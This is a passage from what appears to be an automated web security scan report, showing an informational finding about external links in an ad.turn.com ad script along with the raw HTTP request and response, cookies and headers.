P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 16:44:55 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:44:55 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=ojI42e6Z4xWvMFdtBrBpzjkrrTWsLDfc7OA--dWxUuq76nVUEQrqCfHGx7lLD55exEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7YnPNAqpsobwskjQzsb37_Pf2EzZTks7MGb0-GsBSAyZLfwESJ4HNhmJtjvBex-YKB5MGYB2nENTxzt6uCLwC5ZNpEEy1Y6E_EHxRfmbLZ1cZAp6lfWXEyXpQ0UKYwGF6TGhPyeXqnVY7Z3281c6JDsemNa-3CGw7dg2Xbxl9yyj4GzMLLi_eaSDDqINHp02oDhNKKp2uy6Jf_izbJ4fT1Iu_2URTPQwp7prxJqmG7gw9SyCjmpX6JZPgLa8yTvHuZqGjdQJTtjVZ9bXK_YQ_BTqP4noXltQtlWO_ADLz9yaG1HPNJmxjyYHWoZ-RvqO1R0S-iv_7FnY0Y5Xeddz_jO_ftWvK6YyvSIbYzcA4q2yx3BGIBe1qfIDTYPebZTLrDwtRWptERdq1_CwAIiDWPEKR1gXBTdH5jry0PtoQ1AeLHTgneiPs4w-PNB0rlR8LbQ13hqHz-NHOrXrabdjXmcRCHTQmWZ5Wp2jjyoTn-TRx9yZxewgOeaPJ0dTEeD2PttBPdeqoht9ByqjYbOh33ulo3YD0zbB9W6Jh-fPou70xdysS9NILgDVV-2RjchUloGmpS1vpTy7CEw_F27aSBKrxrCOwXSkhXOnAokDiKNJ7fwESJ4HNhmJtjvBex-YKAXUSxCCUQ26wFsXGXfUWiK7dQaUAsNKGmGOpY_21OII2rMkfzJCRjod-12LuM3yNFSsZtDmqT68cmfxNCdttVxemNa-3CGw7dg2Xbxl9yyjxUjUlBm2w0A6oYt2TFvb88wfqRHkdzRktg9x4ASm7mYj6Inq-va6FwQyLupvU3--XP7Da31DnYEVo5TPgRz20FKAxRbrlyXHThuNPN1jDRBvhv9srP-kTaIcRKtruz8xbA3_z4NlZPxFoPt3Uw_aRVt2Sjt4NAApGdsd_-0PEMXjE6yPZZhOyvYBhiy3zUpF9BpGxWFEALHWvTD43XAH-Iz5LxlHD6gT5P6VEiPCAVtVdA-aRZXmNDP7lSI2wQSG2w5BlZ4tc8pkIHd8H8L-xK4fm6FGNUPUMYboq088JyqQUmOopNBcLSjTKn79ZOQhTmVdbYP4bgaO9TMDasDdVqyYLZMG4wQKFopdYuz1yBk_WTcjbPN3mh6T8lt42bAGUQkq0n0yMG86X_ZGC4oqWkH26xISdXb2Czt_sqnDjr15CZdwH63dX586rlVt-rm7c-SIYtOVAAH4DJGVnLyE0x0v__lBaWO87e1AlQVl6_5QQ0XtSgyP9-pRtjKBA9Cwx-7jM7wzJ-e1KR4AWumyOFjw1q3jr96MmE73EdnErm3CsZj-9Y-IHVpkhS7eipeok16HzBI1TUzj1EOHWWsSpuj37arSozuBgqeZjp8etrKVvDX7YWXcSdD1aEDMLZlwoKqMVJJLJFDSB1wQojnNFJ5MjwaWpgyFsbfzsaKbPWXKX_vqyjA0DxMoo1UcyAMl-UwHwhiIhI6vYlDAmBKnXsfya2KjePXc1jDyJp7bZT6sDf_Pg2Vk_EWg-3dTD9pFbmyKQTjNFZ_HcWRayD9282nXEORSTSNHt8-t3oj2i7-l7s6FAXEc8n5El2XcbrTuegxVWD_jGGk22eMLPtB6OBV0D5pFleY0M_uVIjbBBIb8Yl1NWuJvdZemV_gRsyhYECTZa3gg4ITiJkOIERx75guRh2N-PAXP1mZ83CNFUeGL7kLoy5e_c7ykdku9uolxbJgtkwbjBAoWil1i7PXIGQdIp3I_PcAy51x0-dohwxyvdUa0NuxLM2XW_puxeWePm7nvKhzW7ExyTUJftqS9GRtIcJ13wOqVugrJJQWfPaDlancBmCiobpoVQZKqqN2LNQ1OWRy-25B5SDAG71c9XpuyLlqht-ajodMyqXVi1Cfn2R2Vau7X5-cMnEdJ6r2Z4lgdvHdm53MAZaS0O0Qlfxblav9J01d-B7FA05rcUpzgSpee0pzn-zH34TLYJh2OKjNQuLSL_AER0bCrOYMby51tKibbkc9lEQA79dAymt-_4bu8BZkNrY1dGDCWhKzPhCgeWsgGfMkFX4HzQVWQqFg2BaAuYOnsQlSn5t3zRbJC5ryxb-3bGj5a5KFuu60RriTW_fRiD-EyoZMz5Idfibr8WjiDSnM4ZZATJKUQIeAiWWBUQxuKfY0m-KUHuSwyrtLP__ldjsbRYS1T0uHXJk24PSL8z3mFkMRObsNqHzbQA0GI3YPOGb-lYcNs_O6CBvbTlsrpNMd1ulI4WK-iREZGyAk6GegiyaVz00abWV5MmZ-fZCX_Ri2brYMHscON3agSj1p78H4smnUeQN5ozThlR1suhxo400NYsRnWwGfeWiJ1TDAaZIcpAr39zh4K7iKNV7BI50YuOvYUPTO2bQN4fyQSnFcwPjfDwZbBSsvKlG8M9beE-KPzFPUMPqmUIGBYPhkAM0V8Ec3x06vwXnMZEghdsKPsk3t0o6iBE_G1l8aLmFzsHxBxhdbF6ZR4o1EH9wuuSktDFKkbQwDphyNR2A64wqbonkcOCznLneqtknJBUV5xPA0q_m72DPx4y9cGq2SxLktQ82RQAlXbMGX1RCwZTHTEb4Y-w8vIE7xMGl5n-x6_dNctsmg2y-J7Qf49je_uHiyZQMqn6iPpP_jgBwscC4H7EST9njSjKbo5GCexBy8zIAiUxdUWnERcbJbfXtPFDdQNIlc_NQAI5BaidAF8ZdcnhUhaQZx_gVZ5RM2RQt8-CrAvQ2xmPxHLQ9FNKGm_otEhAuKCCL1ldjwdZsnyHbRQCUGjlpWhpeC8HZ0E-3snipRTbrPuJEsdt04psQlUPIjPlqdKSfwBFwmJI4O6PX8YfhTcbG4AsUupIMCtW92pY93UYfQKoQ4mjJSw1EYK6cBGodjW6hazRpuuHlWJ1JvOW-l8P0HN513R9DWs1EAP8qWIguyoREoF2kJIwx2tEHiHWkjfeBxQ7gLqfeAit_JGi1bkNsJ8PFUesr06hk7Uyqkx_5wP0wx4PE6wwjYdfnQyS8aaFxnusjLISLN2TJ3jpAVRrxYR-1Hb-tqekUsOmdFYg80aMUHzn4CBhCqLcCLSjMLK4TU-9Z53UuLuuUkAzGne6G5uAuqICLaao59R2elM0Ab3c_RTt10nS35UI7kGK7NiRfcS1KCLA5KaP26BtwiskEIQOxRYF7q7Ym3aKJQG1_aVzcIVyN8_fQgL5rKKSkDVUjOglsJUKw15qNG24102XqLE0rwT-8-KwGUPdkCWjk0EEMZkr4oLeFnX1LM_f8dwx2VpKyOHrG4_glnfgAbC5ZN7Uea_4nQJkgxI_msSbb6i7wiZqum8QQelnAkUDZM4ksZGlqtmBTf9hFgjscnX-1tljCUwf0byIT-FIvcCkGvbirxHYPrnUSHgwvkcqY0-WtJOH8xOGRlmfYebfXIHxp-Vq7z; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:44:55 GMT; Path=/
Set-Cookie: fc=8RONmHb1aTVU770ve6jBWNLDYjaEPwW9o1L3C0zzno_cpLRe4bq3ReqRkOtaoYvFyHAuaTl9mF7nALiSlM6KORW1jBMsMhZGMM020wYbRBOBkYH-sePWOj8HY_mY9pYLlj0OKyDUJ6zCGerhtciQWknN5JzhBQj-IKpWSX33b5kVxzGoC7kGLIbIhejl5eSL117dg5whaFGMwxNuo3bM3cdBF4hyWWGJ3xpNV_dvAQw_F9c8z5-xQ96PvJcb-tlK; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:44:55 GMT; Path=/
Set-Cookie: pf=5StVuEq9Dzy8SHy5LvPaE-CZbhgJZ6rTXPj0mN3Grh8IHKIn0aMUCJnjty0nF6sdUM6FlmDOQFfAiBBttkwsDHdyfZoF-SypcgCdfA-fGunB8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:44:55 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 16:44:54 GMT
Content-Length: 10114


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
</div>\n            \n                <img border="0" src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=tf&c=19&mc=imp&pli=2442545&PluID=0&ord=&ord=2533544846377403586&rtu=-1">\n                \n        \n    \n        \n    \n                    \n                    \n\n\n\n\n                        <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&mktid=1&mpid=104198
...[SNIP]...

23.47. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25622058&ahcid=787926&bimpd=ZgRAXFQYPQ72pSfK_PTQXwYv4sqzRgrPFWEPN0T11xiEIpxs2hJ8CaiUjHpmY1v-N23Q0O1bkk3X5KD3AvT7rK9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BAVsGcZaad0LohGRrY_PptpgOqkQGoDTJbJd7uwGGvhIlgHBzIj8H9loLjUdnhyPRbB5cdXFU4eUtt0Sd-buMq4iT9bDskPT3GYIORMjuNHSgU2xBm3QHaMdsIoCKhXuXzRgCD-gHnxGWovO3Pj6yB57QZSR55M9KtvER9_PB-eitC8cnfVoc-ffY0bjr9ypPula_qJLrXcrZr4baiYl_ymbdXBugl_YriUkFVc2JIJzcrbHBKfRsOA81Nd1u8is6AaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IMmAKf-fTCPDGWd8sW3YPeje31BMcyDn3elA9zU91mj8tpJsct7VH1G9-d_6KUMHbX91mNtx9s8FQapZIbkQ1tLXj2l4eq3bXsLRG2lgk3vFLdD31mqGRsMBpPXQG-h3S5RRYa-cfSyudFlPXwGJCEdWGFeOJW7Ysm02dNTuGUaDt_T370WDWWY1SqEwEJwbhx8Qd9AYEkrt9Ysl-GVyMgJyFabNKBnxQoIOFlgiYOrJA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbROhQAEnBkK5TqFIPdMcXGIyEr_KizofF-fzw&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB1Ut5hU60TZm4EoX1lAfxmN2HAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtzaFmwsDVNDneUP-J0S8ckVGnH7aw%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680216&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662216231&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662216243&frm=1&adk=2614322350&ga_vid=1201236310.1303662216&ga_sid=1303662216&ga_hid=2010158345&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=wMdN3IA4Gj6r2JeEG2Scom1vMTqPvhqCchn_dwIVK3bAQoMWzzeIRUwqlX4XkpTlxEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7b0mfx30Z0m20DUYOHma1iMewwKNG6Vp-GxfVf_EykU6LfwESJ4HNhmJtjvBex-YKCc8G7vou24z--w_gke0ns7NpEEy1Y6E_EHxRfmbLZ1cWrMkfzJCRjod-12LuM3yNEMg6fMWn5Rve6KLxWq7P0IemNa-3CGw7dg2Xbxl9yyjzN5A4QuG2K_aAO-SHF7T3HhNKKp2uy6Jf_izbJ4fT1IrryLc_cS88mcNh9O05zZai8bW8edLI4EYiBeioa8Nn9qGjdQJTtjVZ9bXK_YQ_BT6XeCQtDvRN0cpJn9N6TdvW1HPNJmxjyYHWoZ-RvqO1TyAJqDG6mEyZwudlJBlLWH_ftWvK6YyvSIbYzcA4q2yx3BGIBe1qfIDTYPebZTLrCK9n04eTj2yLvG-HV9NqT6KR1gXBTdH5jry0PtoQ1AeAN4eSYVpeIfay296bMhgEJxTnotBPRoUrzcJvCV5S7_9t1sffihX5_BegTFe1GGIwYQ2KIH69otvVReKhLMDlxtBPdeqoht9ByqjYbOh33uTTXcCOkVaDDw03VkGm3uOHwv5ZQ5m2mTzLC0Rhxp-gsGmpS1vpTy7CEw_F27aSBKg9k5fXKFuqlzR-8AtKPkx7fwESJ4HNhmJtjvBex-YKDH_58BKZxUkzXkRdgeq0Ix7dQaUAsNKGmGOpY_21OII_mjcC29cWKAFZLsmzdyJY4hmtwtXYBDOzWNMpz25aDBemNa-3CGw7dg2Xbxl9yyjwlA4TuBUvX_Z-aUIXCkrqYwfqRHkdzRktg9x4ASm7mYu_2URTPQwp7prxJqmG7gw6ah56-HOIRgSSdEiojeZMNqGjdQJTtjVZ9bXK_YQ_BT4YvFPHKFvClTetIp5sFmR7qweRFW5C80-4q0k8PchIEbneS3P1jt3L2TU8DfXrAaO93Hmpqold0I45kSWFpZUdBpGxWFEALHWvTD43XAH-IISjk4v2YhwfWhYQtvWgYgVdA-aRZXmNDP7lSI2wQSGymRCuiX3msEf9Zx7_6oXdHFf3tE5HaJy7RuA2Rf6LYdaupG0mP-ALWuA6T1v3SoZ6tsowBc5pDAMyPtooX8bZ-yYLZMG4wQKFopdYuz1yBkr0NceN6dcXfCMb4qxb1ERCcJYAYD6EJQRZIEqwxwbz_yU6FIdm7osa-pnXnLvWEHNvHc1u2FfaaVBP8uYfPQfuUSZnolg2Mpi0PobZmvQDOteZNpUmAWLLBJZU75gkasQQ0XtSgyP9-pRtjKBA9Cwz2-4R9q34tPG7_LuWX_-aNjw1q3jr96MmE73EdnErm31cGBaFvfPGmIk78ZSjniU14SZgXhN6QRQnmxfn_Dr0Sj37arSozuBgqeZjp8etrKTdm0m9YtM5QtSe1bVf3R9YKqMVJJLJFDSB1wQojnNFLul7Qf_CirYJ-2QPYzq4yhsN0iuvZzF2TN72AdplWiGw8ZmyZijY6_JnGie9hFbVWeVYVArdJUjqkVsoRhZx5NsDf_Pg2Vk_EWg-3dTD9pFTjLDlon4jl8OOYYJTu_NA2U7H715d1gC9l-sZbJovak0GkbFYUQAsda9MPjdcAf4rBmUpt5y4rpKeABCF5QVHZV0D5pFleY0M_uVIjbBBIb9xT-csezj6lwXj_Nmdt2seLQXpLB6S1HBINAWF7E-PHgGmzu9XVcy87K21WiFWA7eN32Cn9-yoSfhGoimhWR97JgtkwbjBAoWil1i7PXIGRwNeiC56J41DeOs0h4Jdxf3U9yID4iMwKKBdWV0IWb4TfoQpcwAkPV_qYEXL4IsHf7dumssffcgoAlY6D2cXtVQQ0XtSgyP9-pRtjKBA9CwyrXT4Jtn4VTomBGSvjPUlhjw1q3jr96MmE73EdnErm3uasuleILtl5vfSa5So8yJ9SNrmRJCF3Pym6bROG15rEJXP1NEAEZrQLuU5tQYJdPZM1f6dELuAO8KtDRpqB5gmeMi1_n57x6YbK1sWcZupAhILP-pxiHcDJ1yFRsxk-TpsurtJYm25B4wm31tw5WHUD1RI5tHbziFyffCyec3xGAUJ346hmYbpDuUQ4oKjAiuL-2hbuln5AhIPfoFUF_EOHEnUDigVg1M2ynf_Wev9WX3kdiLElhX_nAiyZmBTfdm-XlB5QoWysyF-Y7Hf1MZXBheiAjiFf5UzegIuH4PUQO-ze74swfA11CtF02V_39E9eoWE0gjO__pRMYYCNos0id5u8voWars0ao_qpATqNv_nBNy4ucZg6Y4GMkS-Uy8QQogP__eeWKX_QyF6ZbfYlb808DY-4xpXvlG467_nOUxOanVNnn4gjMy4MXX_SYFgsT-Nyw6KA-UjtAzGx3ST26t-B9xRBN7mU2hlplarkFg1XBpthQ9HeAKEBf7kLSFRszfmYYe7Uvism5tsd-daY69ooDGZ3MpHXJdraprT7FOexOskvdKO4Nn35_FhBwTIvlSRAKdhdfTf_oLe9lSCovVmdibgj-eMxLBiVi9XaDpNlPu8OR8iP58nJcBcTfVBGx3ns03mUvCZAJm2YFEhr_SLCdfj6RZeVGuJjlpic4ukWbG8MrCkW6W1TNM51xyxUVFhCvn0Tsd2NN9Zg8CyVNSFbYT5i7EXUVsdX8VTpF6b_wTUKzPif6s4UsPRj5Xq329VWKuLUk8yR2TvuJlbPnSCsBMPzFM2TT622lUby3hrchtrkdVv94MMYvLFr_QqjhVA8noDmAMG3mRsWKcAWLEnchZRjNygyTywHm2OJOtAGVx_Q0nNelONr6KGG7VcX71eFucJce-UVDjth4kBZtDZf5aNFW5vne7J0GifHJC9Q26Zmd945oWbNmUqXPynv7-EjJb1GgH4fe1ui1I38Lrlk2aw4cliTmTdJH5kbLRf7BMVwcZSGDzwm2Qf_W4QVN6Lw-cKLO8HW5YV58k9EmBovamd8o5wXzBFcJNgrTgOkCvP7Ms3Fd5TPD_21_ejEQEJbqeXQUkzlYFcpDfg3SVkp2FuVxIrMGA3hfolqzE6cYcSZIw5Uge7dI3IPUCqdnj0RzdD__y88TuHkXTWbqfXJR9tgKEcSYsF5AX81Jta6gkfeXbpfsrmLzagraPNlNQ7J9TajAB7jF_keXq7ipPVd-EbmqZHsO7WXJvyIS0LUxtihMHYGwWwPA1JQL2IPKnquMNSJ2dSU9GU0v6gIXPR87vyMdp2dqCEd60B_1OnYdcYkjhrAnU-9dGVkZrkW95fREPDVij03vj6W4YsDRmROKtAdqTEo6ecRSen_KPX3qjSxDK7eb-eT6Hy4rJW1Y4ARYPqBC-WuBQ54IPnkbgv_bB-Nmf2BwkRnorhiE47RUKLg2hVWexVlrcySxjLiP3S7m3-9MWoRkGSwVlp3hdA59kr-DRGiUI8UincYYJ-MDe6abpHIdnYqv2T4X; fc=UvO6miSA7srWaSUFmeMCcpUTZjrhTTWDDAvcQFQBnA_cpLRe4bq3ReqRkOtaoYvFyHAuaTl9mF7nALiSlM6KORW1jBMsMhZGMM020wYbRBNf-jvyPTWZaxMWGxN7lkboTgByV_ewuIYjgH3E0_oqobAomfI1NdN8_rfrRwVG6-YVxzGoC7kGLIbIhejl5eSL117dg5whaFGMwxNuo3bM3cdBF4hyWWGJ3xpNV_dvAQw_F9c8z5-xQ96PvJcb-tlK; pf=0O0Evp5LqFqqor_WKvU5V8b90v2rJtW6tPaq4hh8j0wIHKIn0aMUCJnjty0nF6sdNC5UW7w2j6p7Ica3tqyPtLMm4306x4iI_gVgxycj0XjB8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 16:23:34 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:23:34 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=7n0jLc6wfhYtN4UC_xZHjDE8GknzFh8Yypyq6cE5VZLAQoMWzzeIRUwqlX4XkpTlxEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7b0mfx30Z0m20DUYOHma1iMewwKNG6Vp-GxfVf_EykU6LfwESJ4HNhmJtjvBex-YKCc8G7vou24z--w_gke0ns7NpEEy1Y6E_EHxRfmbLZ1cWrMkfzJCRjod-12LuM3yNEMg6fMWn5Rve6KLxWq7P0IemNa-3CGw7dg2Xbxl9yyjzN5A4QuG2K_aAO-SHF7T3HhNKKp2uy6Jf_izbJ4fT1IrryLc_cS88mcNh9O05zZai8bW8edLI4EYiBeioa8Nn9qGjdQJTtjVZ9bXK_YQ_BT6XeCQtDvRN0cpJn9N6TdvW1HPNJmxjyYHWoZ-RvqO1TyAJqDG6mEyZwudlJBlLWH_ftWvK6YyvSIbYzcA4q2yx3BGIBe1qfIDTYPebZTLrCK9n04eTj2yLvG-HV9NqT6KR1gXBTdH5jry0PtoQ1AeAN4eSYVpeIfay296bMhgEJxTnotBPRoUrzcJvCV5S7_9t1sffihX5_BegTFe1GGIwYQ2KIH69otvVReKhLMDlxtBPdeqoht9ByqjYbOh33uTTXcCOkVaDDw03VkGm3uOHwv5ZQ5m2mTzLC0Rhxp-gsGmpS1vpTy7CEw_F27aSBKg9k5fXKFuqlzR-8AtKPkx7fwESJ4HNhmJtjvBex-YKDH_58BKZxUkzXkRdgeq0Ix7dQaUAsNKGmGOpY_21OII_mjcC29cWKAFZLsmzdyJY4hmtwtXYBDOzWNMpz25aDBemNa-3CGw7dg2Xbxl9yyjwlA4TuBUvX_Z-aUIXCkrqYwfqRHkdzRktg9x4ASm7mYu_2URTPQwp7prxJqmG7gw6ah56-HOIRgSSdEiojeZMNqGjdQJTtjVZ9bXK_YQ_BT4YvFPHKFvClTetIp5sFmR7qweRFW5C80-4q0k8PchIH--7-v9iqta9cngGoURkxMGcnA7v8jRH4b4sl7n9PZN5e7OhQFxHPJ-RJdl3G607nR8xTSPvK-p126IlPZnORzVdA-aRZXmNDP7lSI2wQSG55QP38_1fR9TckYAsb5pqNucRLlW4qnXZ7CXUVHWv4ip4RnopZye3I2VeDNhcjONP3-03B9JybbDQvPN0b-ukCyYLZMG4wQKFopdYuz1yBk6uornER4wRmSESJpiu82ECcJYAYD6EJQRZIEqwxwbz_lEmZ6JYNjKYtD6G2Zr0AzhTeXLgOjd5mCNMGZRMvzlPAi0-ygCjElB_D6jIRDFHIIScgwH8T5VpAgEj7tO6HQQQ0XtSgyP9-pRtjKBA9Cw7ifk0uxOjACIFVeNuv3Kptjw1q3jr96MmE73EdnErm3EO2R2jzxNQwIDSsUseWLhslLQZMoibX_53_H1iN9tYSj37arSozuBgqeZjp8etrKSH2BCJVCBKtPUgj7zhVaUIKqMVJJLJFDSB1wQojnNFKx04J3oj7OMPjzQdK5UfC2Jq2FR28g6N4ppYAe8Ruw3nqjVEnayD5Ik9CHgcwVvzn1LVARRZp3iAtwxIPfX4lcsDf_Pg2Vk_EWg-3dTD9pFenpFYpar7IAWiFrHeXfQIHuPt4ZMkfGTNUtC_PYTNHvl7s6FAXEc8n5El2XcbrTueV1rSiLZsaR5sVWtdVotFRV0D5pFleY0M_uVIjbBBIbVCiLiBpBUs_aknr5mSZhhuLQXpLB6S1HBINAWF7E-PF0vobXYP71SE5qK-q8G4NqDlZT0T_GBbo0bdYkYrIM6bJgtkwbjBAoWil1i7PXIGQAPq2-xg2GU0iNwzc4oGYf3U9yID4iMwKKBdWV0IWb4UHV201d3HZkauFg6OLUDww3Jco1_R6UO1xvstgmxd5oQQ0XtSgyP9-pRtjKBA9Cw-GbtMuSaHyCQtilVO0TY35jw1q3jr96MmE73EdnErm3sXSWj33G2Id3fM0m0Vv4l0jli_TYoFivdNz7W5XnWhDyphPg-RvEIoKBsFf6hjJvz2j2Qwj8cAVDSdBqW8BsrEqZy6Y983pwwSDKSbe2RC_kQoqJU_QjMpvwA6B8XQ75PSe6v1RpmK4AsjvGkw2msw7A-ILjAFqpx2M97C_Qt